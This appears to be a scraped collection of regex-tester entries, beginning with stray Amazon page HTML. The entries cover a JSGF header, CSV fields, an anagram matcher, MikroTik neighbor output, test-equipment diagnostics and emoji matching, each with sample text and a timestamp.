src="https://images-na.ssl-images-amazon.com/images/I/311Xw94d26L._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-5"><span class="a-button-inner"><a href="/gp/offer-listing/B07FYS34S4/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=5&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-5-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41r4qvtmEkL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-6"><span class="a-button-inner"><a href="/gp/offer-listing/B00MC3TVSK/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=6&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-6-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/31YEDbIcNwL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-7"><span class="a-button-inner"><a href="/gp/offer-listing/B016W1Z1RC/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=7&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-7-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41plM8TSFBL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-8"><span class="a-button-inner"><a href="/gp/offer-listing/B0007L7WPS/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=8&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-8-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41NGM8gp7hL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-disabled a-button-thumbnail a-button-toggle" id="a-autoid-9"><span class="a-button-inner"><input disabled="disabled" class="a-button-input" type="submit" aria-labelledby="a-autoid-9-announce"><span class="a-button-text" aria-hidden="true" id="a-autoid-9-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41WBKxWvoLL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </span></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-disabled a-button-thumbnail a-button-toggle" id="a-autoid-10"><span class="a-button-inner"><input disabled="disabled" class="a-button-input" type="submit" aria-labelledby="a-autoid-10-announce"><span class="a-button-text" aria-hidden="true" id="a-autoid-10-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41ap6ahxMRL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </span></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-disabled a-button-thumbnail a-button-toggle" id="a-autoid-11"><span class="a-button-inner"><input disabled="disabled" class="a-button-input" type="submit" aria-labelledby="a-autoid-11-announce"><span class="a-button-text" aria-hidden="true" id="a-autoid-11-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41QD5K54hPL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </span></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-disabled a-button-thumbnail a-button-toggle" id="a-autoid-12"><span class="a-button-inner"><input disabled="disabled" class="a-button-input" type="submit" aria-labelledby="a-autoid-12-announce"><span class="a-button-text" aria-hidden="true" id="a-autoid-12-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/31qtQ78OWiL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </span></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-toggle" id="a-autoid-13"><span class="a-button-inner"><a href="/gp/offer-listing/B00NNA39IE/ref=olp_twister_all?ie=UTF8&amp;mv_color_name=all&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-13-announce"> Lowest offer for each </a></span></span> </span></li> </ul> </div> <div class="twisterDivider"></div> </div> </div></div> </div> </div>
ASIN PAG1 V3
2018-12-24T05:45:05.000Z
^(?:#JSGF) (?<version>V1.0) (?<encoding>[A-Z-0-9]+) (?<locale>[a-z]{2}-[A-Z]{2});$
#JSGF V1.0 UTF-8 hu-HU; grammar planmaster.hu; <command_change_odontogram> = ( <change_to> [ a ] <odontogram_mode> [ felvételére | felvételre ] ) | ( <odontogram_mode> felvétele ) ; <change_to> = ( váltás | válts | menj | ugrás | ugorj ) ; <odontogram_mode> = ( státuszra | státuszhoz | státusz ) {state} | ( kezelés | kezelésre | kezeléshez | lépésekre | lépésekhez ) {treatment} ; <command_full_jaw> = <all> * ( alsó {lower} | felső {upper} ) [ fogsor | állkapocs | fogak | fog ] <all> * <status> ; <all> = mind | összes | teljes ; <status> = ( <status1> | <status2> | <status3> ) {status} ; <status1> = ( ép | alaphelyzet | alaphelyzetbe ) {1} ; <status2> = ( hiány | hiányzik ) {2} ; <status3> = [ szekunder ] ( szuvas | szuvasodott | szuvasodás ) {3} ; <tooth18> = ( 18as | 18-as | tizennyolcas | nyolcas | ( 18 as ) ) {18} ; <tooth17> = ( 17es | 17-es | tizenhetes | hetes | ( 17 es ) ) {17} ; <tooth16> = ( 16os | 16-os | tizenhatos | hatos ) {16} ; <tooth_region> = ( bal {left} | jobb {right} ) ( felső {upper} | alsó {lower} ) ; <tooth_number> = ( <tooth18> | <tooth17> | <tooth16> | és ) ; <command_select> = ( ( <tooth_number> + ) | <tooth_region> <tooth_number> + ) [ fog | fogak ] ;
jsgf header (version, encoding, locale)
2019-09-24T15:03:06.000Z
[^,]*[,][^,]*[,][1][,]
402121,,0,23/10/2015 10:57,9/11/2015 19:00,46789,Cheese and Ham Pasta,,0,,,,,1,,1 407057,,1,28/10/2015 10:32,28/10/2015 10:42,47326,Deep Fried Soft-Shell Crab and Oyster,,,,,,,1,,1 407062,,1,28/10/2015 10:32,28/10/2015 10:42,47326,Lemon Chicken Wings,,,,,,,1,,1 407062,a,1,28/10/2015 10:32,28/10/2015 10:42,47326,Lemon Chicken Wings,,,,,,,1,,1 407062,aa0,1,28/10/2015 10:32,28/10/2015 10:42,47326,Lemon Chicken Wings,,,,,,,1,,1 407062,aaaa0,1,28/10/2015 10:32,28/10/2015 10:42,47326,Lemon Chicken Wings,,,,,,,1,,1
Fill out 2comma
2016-02-19T10:33:25.000Z
this is an anagram matcher to run upon words
(?=.*p)(?=.*o.*o)(?=.*u.*u)(?=.*l)(?=.*t.*t)(?=.*r)(?=.*y)(?=.*w)(?=.*i)(?=.*s.*s)(?=.*a)(?=.*n)(\b.{18}\b)
pastilsturnouttowy pastilstowyturnout towyturnoutpastils poultryoutwitsants
Anagram match of "poultryoutwitsants"
2015-08-14T12:57:19.000Z
\b(([\w-]+)=([\w.: -]+))(?= |$)
0 interface=ether1 address=000.000.000.000 address4=000.000.000.000 mac-address=00:00:00:00:00:00 identity=adf foo bar platform=MikroTik version=6.29.1 unpack=none age=50s uptime=4h23m16s software-id=AAAA-BBBB board=RB750GL ipv6=no interface-name=bridge1 0 interface=ether1 address=000.000.000.000 address4=000.000.000.000 mac-address=00:00:00:00:00:00 identity=adf_foo_bar platform=MikroTik version=6.29.1 unpack=none age=50s uptime=4h23m16s software-id=AAAA-BBBB board=RB750GL ipv6=no interface-name=bridge1
Crop mikrotik neighbor lines
2015-06-29T18:50:50.000Z
(\n|\t)*
teste mais complexos
exemplo-flex-2
2015-09-05T00:58:24.000Z
-?\d+(\.\d+)?
2010 -1000 10.2
2
2015-10-30T16:28:59.000Z
\[([^\|]*)\|([^\]]*)\]
'Assets have been removed from this pending application.<br />The following [asset is|asset's are] no longer available because [it|they] are no longer active: {0}
Singular or Plural
2014-02-13T17:03:43.000Z
Regex to parse ETS364 Minidiags. 9C RELAY, VI to BUSA Open, K4A2 or K5A2, I2 Chan2 EXP= 20.000 +/-0.600mA ACT= 19.998mA RES=APU12 34/p2 SN: 1967 9C RELAY, VI to BUSB Open, K4A2 or K6A2, V1 Chan2 EXP= 2.00000 +/-0.057 V ACT= 1.99993 V RES=APU12 34/p2 SN: 1967 9C RELAY, VI to BUSB Open, K4A2 or K6A2, V2 Chan2 EXP= 2.00000 +/-0.057 V ACT= 1.99997 V RES=APU12 34/p2 SN: 1967 9C RELAY, VI to BUSB Open, K4A2 or K6A2, I1 Chan2 EXP= -20.000 +/-0.600mA ACT= -20.005mA RES=APU12 34/p2 SN: 1967 9C RELAY, VI to BUSB Open, K4A2 or K6A2, I2 Chan2 EXP= 20.000 +/-0.600mA ACT= 19.997mA RES=APU12 34/p2 SN: 1967 9C RELAY, VI to BUSA Open, K4A3 or K5A3, V1 Chan3 EXP= 2.00000 +/-0.057 V ACT= 1.99994 V RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSA Open, K4A3 or K5A3, V2 Chan3 EXP= 2.00000 +/-0.057 V ACT= 1.99996 V RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSA Open, K4A3 or K5A3, I1 Chan3 EXP= -20.000 +/-0.600mA ACT= -20.003mA RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSA Open, K4A3 or K5A3, I2 Chan3 EXP= 20.000 +/-0.600mA ACT= 19.996mA RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSB Open, K4A3 or K6A3, V1 Chan3 EXP= 2.00000 +/-0.057 V ACT= 1.99995 V RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSB Open, K4A3 or K6A3, V2 Chan3 EXP= 2.00000 +/-0.057 V ACT= 1.99976 V RES=APU12 34/p3 SN: 1967 9C RELAY, VI to BUSB Open, K4A3 or K6A3, I1 Chan3 EXP= -20.000 +/-0.600mA ACT= -20.000mA RES=APU12
(?P<TestName>.*)EXP=(?P<EXP>\s*(?P<EXPvalue>-?\s*\d+\.?\d*)\s*(\+/-)?(?P<Limits>\s*-?\s*\d+.?\d*)?\s*(?P<EXPunits>.*))ACT=(?P<ACT>\s*(?P<ACTvalue>-?\s*\d+\.?\d*)\s*(?P<ACTunits>.*))RES=(?P<RES>.*)SN:(?P<SN>.*)
QTMU 0, Serial Number: 1494 6A EVENT COUNT POS edge EXP= 512 counts ACT= 512 RES=TMU0 SN: 1494 6A EVENT COUNT NEG edge EXP= 512 counts ACT= 512 RES=TMU0 SN: 1494 6A EVENT COUNT 2A -115V thru Mux to IADC EXP=-2.79940 +/-0.315mV ACT=-2.84159 V RES=SPU 13 SN: 3609 4I ADC2 FORCED OVER RANGE EXP= 0001 ACT= 0001 RES=QMS4 /16-0 SN: 674 4I ADC2 BIT TEST EXP= 0fff ACT= 0fff RES=QMS4 /16-0 SN: 674 9D ADC, GND EXP= 0.00000 +/-20.00mV ACT= 1.53825mV RES=APU12 28 SN: 3789
Minidiags Regex
2018-02-05T17:06:13.000Z
\s*No further distribution of this document is allowed without approval by the CEO or CFO MMR Policy Test\s*
No further distribution of this document is allowed without approval by the CEO or CFO MMR Policy Test asdfsdNo further distribution of this document is allowed without approval by the CEO or CFO MMR Policy Testasdfasd
Test
2016-09-07T15:00:43.000Z
Regex encontrara aqui: https://stackoverflow.com/a/20208095
[\x{1F3F4}](?:\x{E0067}\x{E0062}\x{E0077}\x{E006C}\x{E0073}\x{E007F})|[\x{1F3F4}](?:\x{E0067}\x{E0062}\x{E0073}\x{E0063}\x{E0074}\x{E007F})|[\x{1F3F4}](?:\x{E0067}\x{E0062}\x{E0065}\x{E006E}\x{E0067}\x{E007F})|[\x{1F3F4}](?:\x{200D}\x{2620}\x{FE0F})|[\x{1F3F3}](?:\x{FE0F}\x{200D}\x{1F308})|[\x{0023}\x{002A}\x{0030}\x{0031}\x{0032}\x{0033}\x{0034}\x{0035}\x{0036}\x{0037}\x{0038}\x{0039}](?:\x{FE0F}\x{20E3})|[\x{1F415}](?:\x{200D}\x{1F9BA})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F467}\x{200D}\x{1F467})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F467}\x{200D}\x{1F466})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F467})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F466}\x{200D}\x{1F466})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F466})|[\x{1F468}](?:\x{200D}\x{1F468}\x{200D}\x{1F467}\x{200D}\x{1F467})|[\x{1F468}](?:\x{200D}\x{1F468}\x{200D}\x{1F466}\x{200D}\x{1F466})|[\x{1F468}](?:\x{200D}\x{1F468}\x{200D}\x{1F467}\x{200D}\x{1F466})|[\x{1F468}](?:\x{200D}\x{1F468}\x{200D}\x{1F467})|[\x{1F468}](?:\x{200D}\x{1F468}\x{200D}\x{1F466})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F469}\x{200D}\x{1F467}\x{200D}\x{1F467})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F469}\x{200D}\x{1F466}\x{200D}\x{1F466})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F469}\x{200D}\x{1F467}\x{200D}\x{1F466})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F469}\x{200D}\x{1F467})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F469}\x{200D}\x{1F466})|[\x{1F469}](?:\x{200D}\x{2764}\x{FE0F}\x{200D}\x{1F469})|[\x{1F469}\x{1F468}](?:\x{200D}\x{2764}\x{FE0F}\x{200D}\x{1F468})|[\x{1F469}](?:\x{200D}\x{2764}\x{FE0F}\x{200D}\x{1F48B}\x{200D}\x{1F469})|[\x{1F469}\x{1F468}](?:\x{200D}\x{2764}\x{FE0F}\x{200D}\x{1F48B}\x{200D}\x{1F468})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9BD})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9BC})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9AF})|[\x{1F575}\x{1F3CC}\x{26F9}\x{1F3CB}](?:\x{FE0F}\x{200D}\x{2640}\x{FE0F})|[\x{1F575}\x{1F3CC}\x{26F9}\x{1F3CB}](?:\x{FE0F}\x{200D}\x{2642}\x{FE0F})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F692})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F680})|[\x{1F468}\x{1F469}](?:\x{200D}\x{2708}\x{FE0F})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F3A8})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F3A4})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F4BB})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F52C})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F4BC})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F3ED})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F527})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F373})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F33E})|[\x{1F468}\x{1F469}](?:\x{200D}\x{2696}\x{FE0F})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F3EB})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F393})|[\x{1F468}\x{1F469}](?:\x{200D}\x{2695}\x{FE0F})|[\x{1F471}\x{1F64D}\x{1F64E}\x{1F645}\x{1F646}\x{1F481}\x{1F64B}\x{1F9CF}\x{1F647}\x{1F926}\x{1F937}\x{1F46E}\x{1F482}\x{1F477}\x{1F473}\x{1F9B8}\x{1F9B9}\x{1F9D9}\x{1F9DA}\x{1F9DB}\x{1F9DC}\x{1F9DD}\x{1F9DE}\x{1F9DF}\x{1F486}\x{1F487}\x{1F6B6}\x{1F9CD}\x{1F9CE}\x{1F3C3}\x{1F46F}\x{1F9D6}\x{1F9D7}\x{1F3C4}\x{1F6A3}\x{1F3CA}\x{1F6B4}\x{1F6B5}\x{1F938}\x{1F93C}\x{1F93D}\x{1F93E}\x{1F939}\x{1F9D8}](?:\x{200D}\x{2640}\x{FE0F})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9B2})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9B3})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9B1})|[\x{1F468}\x{1F469}](?:\x{200D}\x{1F9B0})|[\x{1F471}\x{1F64D}\x{1F64E}\x{1F645}\x{1F646}\x{1F481}\x{1F64B}\x{1F9CF}\x{1F647}\x{1F926}\x{1F937}\x{1F46E}\x{1F482}\x{1F477}\x{1F473}\x{1F9B8}\x{1F9B9}\x{1F9D9}\x{1F9DA}\x{1F9DB}\x{1F9DC}\x{1F9DD}\x{1F9DE}\x{1F9DF}\x{1F486}\x{1F487}\x{1F6B6}\x{1F9CD}\x{1F9CE}\x{1F3C3}\x{1F46F}\x{1F9D6}\x{1F9D7}\x{1F3C4}\x{1F6A3}\x{1F3CA}\x{1F6B4}\x{1F6B5}\x{1F938}\x{1F93C}\x{1F93D}\x{1F93E}\x{1F939}\x{1F9D8}](?:\x{200D}\x{2642}\x{FE0F})|[\x{1F441}](?:\x{FE0F}\x{200D}\x{1F5E8}\x{FE0F})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1E9}\x{1F1F0}\x{1F1F2}\x{1F1F3}\x{1F1F8}\x{1F1F9}\x{1F1FA}](?:\x{1F1FF})|[\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1F0}\x{1F1F1}\x{1F1F2}\x{1F1F5}\x{1F1F8}\x{1F1FA}](?:\x{1F1FE})|[\x{1F1E6}\x{1F1E8}\x{1F1F2}\x{1F1F8}](?:\x{1F1FD})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1F0}\x{1F1F2}\x{1F1F5}\x{1F1F7}\x{1F1F9}\x{1F1FF}](?:\x{1F1FC})|[\x{1F1E7}\x{1F1E8}\x{1F1F1}\x{1F1F2}\x{1F1F8}\x{1F1F9}](?:\x{1F1FB})|[\x{1F1E6}\x{1F1E8}\x{1F1EA}\x{1F1EC}\x{1F1ED}\x{1F1F1}\x{1F1F2}\x{1F1F3}\x{1F1F7}\x{1F1FB}](?:\x{1F1FA})|[\x{1F1E6}\x{1F1E7}\x{1F1EA}\x{1F1EC}\x{1F1ED}\x{1F1EE}\x{1F1F1}\x{1F1F2}\x{1F1F5}\x{1F1F8}\x{1F1F9}\x{1F1FE}](?:\x{1F1F9})|[\x{1F1E6}\x{1F1E7}\x{1F1EA}\x{1F1EC}\x{1F1EE}\x{1F1F1}\x{1F1F2}\x{1F1F5}\x{1F1F7}\x{1F1F8}\x{1F1FA}\x{1F1FC}](?:\x{1F1F8})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EA}\x{1F1EB}\x{1F1EC}\x{1F1ED}\x{1F1EE}\x{1F1F0}\x{1F1F1}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F8}\x{1F1F9}](?:\x{1F1F7})|[\x{1F1E6}\x{1F1E7}\x{1F1EC}\x{1F1EE}\x{1F1F2}](?:\x{1F1F6})|[\x{1F1E8}\x{1F1EC}\x{1F1EF}\x{1F1F0}\x{1F1F2}\x{1F1F3}](?:\x{1F1F5})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1E9}\x{1F1EB}\x{1F1EE}\x{1F1EF}\x{1F1F2}\x{1F1F3}\x{1F1F7}\x{1F1F8}\x{1F1F9}](?:\x{1F1F4})|[\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1ED}\x{1F1EE}\x{1F1F0}\x{1F1F2}\x{1F1F5}\x{1F1F8}\x{1F1F9}\x{1F1FA}\x{1F1FB}](?:\x{1F1F3})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1E9}\x{1F1EB}\x{1F1EC}\x{1F1ED}\x{1F1EE}\x{1F1EF}\x{1F1F0}\x{1F1F2}\x{1F1F4}\x{1F1F5}\x{1F1F8}\x{1F1F9}\x{1F1FA}\x{1F1FF}](?:\x{1F1F2})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1EE}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F8}\x{1F1F9}](?:\x{1F1F1})|[\x{1F1E8}\x{1F1E9}\x{1F1EB}\x{1F1ED}\x{1F1F1}\x{1F1F2}\x{1F1F5}\x{1F1F8}\x{1F1F9}\x{1F1FD}](?:\x{1F1F0})|[\x{1F1E7}\x{1F1E9}\x{1F1EB}\x{1F1F8}\x{1F1F9}](?:\x{1F1EF})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EB}\x{1F1EC}\x{1F1F0}\x{1F1F1}\x{1F1F3}\x{1F1F8}\x{1F1FB}](?:\x{1F1EE})|[\x{1F1E7}\x{1F1E8}\x{1F1EA}\x{1F1EC}\x{1F1F0}\x{1F1F2}\x{1F1F5}\x{1F1F8}\x{1F1F9}](?:\x{1F1ED})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1E9}\x{1F1EA}\x{1F1EC}\x{1F1F0}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F8}\x{1F1F9}\x{1F1FA}\x{1F1FB}](?:\x{1F1EC})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F9}\x{1F1FC}](?:\x{1F1EB})|[\x{1F1E6}\x{1F1E7}\x{1F1E9}\x{1F1EA}\x{1F1EC}\x{1F1EE}\x{1F1EF}\x{1F1F0}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F7}\x{1F1F8}\x{1F1FB}\x{1F1FE}](?:\x{1F1EA})|[\x{1F1E6}\x{1F1E7}\x{1F1E8}\x{1F1EC}\x{1F1EE}\x{1F1F2}\x{1F1F8}\x{1F1F9}](?:\x{1F1E9})|[\x{1F1E6}\x{1F1E8}\x{1F1EA}\x{1F1EE}\x{1F1F1}\x{1F1F2}\x{1F1F3}\x{1F1F8}\x{1F1F9}\x{1F1FB}](?:\x{1F1E8})|[\x{1F1E7}\x{1F1EC}\x{1F1F1}\x{1F1F8}](?:\x{1F1E7})|[\x{1F1E7}\x{1F1E8}\x{1F1EA}\x{1F1EC}\x{1F1F1}\x{1F1F2}\x{1F1F3}\x{1F1F5}\x{1F1F6}\x{1F1F8}\x{1F1F9}\x{1F1FA}\x{1F1FB}\x{1F1FF}](?:\x{1F1E6})|[\x{00A9}\x{00AE}\x{203C}\x{2049}\x{2122}\x{2139}\x{2194}-\x{2199}\x{21A9}-\x{21AA}\x{231A}-\x{231B}\x{2328}\x{23CF}\x{23E9}-\x{23F3}\x{23F8}-\x{23FA}\x{24C2}\x{25AA}-\x{25AB}\x{25B6}\x{25C0}\x{25FB}-\x{25FE}\x{2600}-\x{2604}\x{260E}\x{2611}\x{2614}-\x{2615}\x{2618}\x{261D}\x{2620}\x{2622}-\x{2623}\x{2626}\x{262A}\x{262E}-\x{262F}\x{2638}-\x{263A}\x{2640}\x{2642}\x{2648}-\x{2653}\x{265F}-\x{2660}\x{2663}\x{2665}-\x{2666}\x{2668}\x{267B}\x{267E}-\x{267F}\x{2692}-\x{2697}\x{2699}\x{269B}-\x{269C}\x{26A0}-\x{26A1}\x{26AA}-\x{26AB}\x{26B0}-\x{26B1}\x{26BD}-\x{26BE}\x{26C4}-\x{26C5}\x{26C8}\x{26CE}-\x{26CF}\x{26D1}\x{26D3}-\x{26D4}\x{26E9}-\x{26EA}\x{26F0}-\x{26F5}\x{26F7}-\x{26FA}\x{26FD}\x{2702}\x{2705}\x{2708}-\x{270D}\x{270F}\x{2712}\x{2714}\x{2716}\x{271D}\x{2721}\x{2728}\x{2733}-\x{2734}\x{2744}\x{2747}\x{274C}\x{274E}\x{2753}-\x{2755}\x{2757}\x{2763}-\x{2764}\x{2795}-\x{2797}\x{27A1}\x{27B0}\x{27BF}\x{2934}-\x{2935}\x{2B05}-\x{2B07}\x{2B1B}-\x{2B1C}\x{2B50}\x{2B55}\x{3030}\x{303D}\x{3297}\x{3299}\x{1F004}\x{1F0CF}\x{1F170}-\x{1F171}\x{1F17E}-\x{1F17F}\x{1F18E}\x{1F191}-\x{1F19A}\x{1F201}-\x{1F202}\x{1F21A}\x{1F22F}\x{1F232}-\x{1F23A}\x{1F250}-\x{1F251}\x{1F300}-\x{1F321}\x{1F324}-\x{1F393}\x{1F396}-\x{1F397}\x{1F399}-\x{1F39B}\x{1F39E}-\x{1F3F0}\x{1F3F3}-\x{1F3F5}\x{1F3F7}-\x{1F3FA}\x{1F400}-\x{1F4FD}\x{1F4FF}-\x{1F53D}\x{1F549}-\x{1F54E}\x{1F550}-\x{1F567}\x{1F56F}-\x{1F570}\x{1F573}-\x{1F57A}\x{1F587}\x{1F58A}-\x{1F58D}\x{1F590}\x{1F595}-\x{1F596}\x{1F5A4}-\x{1F5A5}\x{1F5A8}\x{1F5B1}-\x{1F5B2}\x{1F5BC}\x{1F5C2}-\x{1F5C4}\x{1F5D1}-\x{1F5D3}\x{1F5DC}-\x{1F5DE}\x{1F5E1}\x{1F5E3}\x{1F5E8}\x{1F5EF}\x{1F5F3}\x{1F5FA}-\x{1F64F}\x{1F680}-\x{1F6C5}\x{1F6CB}-\x{1F6D2}\x{1F6D5}\x{1F6E0}-\x{1F6E5}\x{1F6E9}\x{1F6EB}-\x{1F6EC}\x{1F6F0}\x{1F6F3}-\x{1F6FA}\x{1F7E0}-\x{1F7EB}\x{1F90D}-\x{1F93A}\x{1F93C}-\x{1F945}\x{1F947}-\x{1F971}\x{1F973}-\x{1F976}\x{1F97A}-\x{1F9A2}\x{1F9A5}-\x{1F9AA}\x{1F9AE}-\x{1F9CA}\x{1F9CD}-\x{1F9FF}\x{1FA70}-\x{1FA73}\x{1FA78}-\x{1FA7A}\x{1FA80}-\x{1FA82}\x{1FA90}-\x{1FA95}]
😀 😁 😂 🤣 😃 😄 😅 😆 😉 😊 😋 😎 😍 😘 🥰 😗 😙 😚 ☺️ 🙂 🤗 🤩 🤔 🤨 😐 😑 😶 🙄 😏 😣 😥 😮 🤐 😯 😪 😫 😴 😌 😛 😜 😝 🤤 😒 😓 😔 😕 🙃 🤑 😲 ☹️ 🙁 😖 😞 😟 😤 😢 😭 😦 😧 😨 😩 🤯 😬 😰 😱 🥵 🥶 😳 🤪 😵 😡 😠 🤬 😷 🤒 🤕 🤢 🤮 🤧 😇 🤠 🤡 🥴 🥺 🤥 🤫 🤭 🧐 🤓 😈 👿 👹 👺 💀 👻 👽 🤖 💩 😺 😸 😹 😻 😼 😽 🙀 😿 😾 People and Fantasy 👶 👧 🧒 👦 👩 🧑 👨 👵 🧓 👴 👲 👳‍♀️ 👳‍♂️ 🧕 🧔 👱‍♂️ 👱‍♀️ 👨‍🦰 👩‍🦰 👨‍🦱 👩‍🦱 👨‍🦲 👩‍🦲 👨‍🦳 👩‍🦳 🦸‍♀️ 🦸‍♂️ 🦹‍♀️ 🦹‍♂️ 👮‍♀️ 👮‍♂️ 👷‍♀️ 👷‍♂️ 💂‍♀️ 💂‍♂️ 🕵️‍♀️ 🕵️‍♂️ 👩‍⚕️ 👨‍⚕️ 👩‍🌾 👨‍🌾 👩‍🍳 👨‍🍳 👩‍🎓 👨‍🎓 👩‍🎤 👨‍🎤 👩‍🏫 👨‍🏫 👩‍🏭 👨‍🏭 👩‍💻 👨‍💻 👩‍💼 👨‍💼 👩‍🔧 👨‍🔧 👩‍🔬 👨‍🔬 👩‍🎨 👨‍🎨 👩‍🚒 👨‍🚒 👩‍✈️ 👨‍✈️ 👩‍🚀 👨‍🚀 👩‍⚖️ 👨‍⚖️ 👰 🤵 👸 🤴 🤶 🎅 🧙‍♀️ 🧙‍♂️ 🧝‍♀️ 🧝‍♂️ 🧛‍♀️ 🧛‍♂️ 🧟‍♀️ 🧟‍♂️ 🧞‍♀️ 🧞‍♂️ 🧜‍♀️ 🧜‍♂️ 🧚‍♀️ 🧚‍♂️ 👼 🤰 🤱 🙇‍♀️ 🙇‍♂️ 💁‍♀️ 💁‍♂️ 🙅‍♀️ 🙅‍♂️ 🙆‍♀️ 🙆‍♂️ 🙋‍♀️ 🙋‍♂️ 🤦‍♀️ 🤦‍♂️ 🤷‍♀️ 🤷‍♂️ 🙎‍♀️ 🙎‍♂️ 🙍‍♀️ 🙍‍♂️ 💇‍♀️ 💇‍♂️ 💆‍♀️ 💆‍♂️ 🧖‍♀️ 🧖‍♂️ 💅 🤳 💃 🕺 👯‍♀️ 👯‍♂️ 🕴 🚶‍♀️ 🚶‍♂️ 🏃‍♀️ 🏃‍♂️ 👫 👭 👬 💑 👩‍❤️‍👩 👨‍❤️‍👨 💏 👩‍❤️‍💋‍👩 👨‍❤️‍💋‍👨 👪 👨‍👩‍👧 👨‍👩‍👧‍👦 👨‍👩‍👦‍👦 👨‍👩‍👧‍👧 👩‍👩‍👦 👩‍👩‍👧 👩‍👩‍👧‍👦 👩‍👩‍👦‍👦 👩‍👩‍👧‍👧 👨‍👨‍👦 👨‍👨‍👧 👨‍👨‍👧‍👦 👨‍👨‍👦‍👦 👨‍👨‍👧‍👧 👩‍👦 👩‍👧 👩‍👧‍👦 👩‍👦‍👦 👩‍👧‍👧 👨‍👦 👨‍👧 👨‍👧‍👦 👨‍👦‍👦 👨‍👧‍👧 🤲 👐 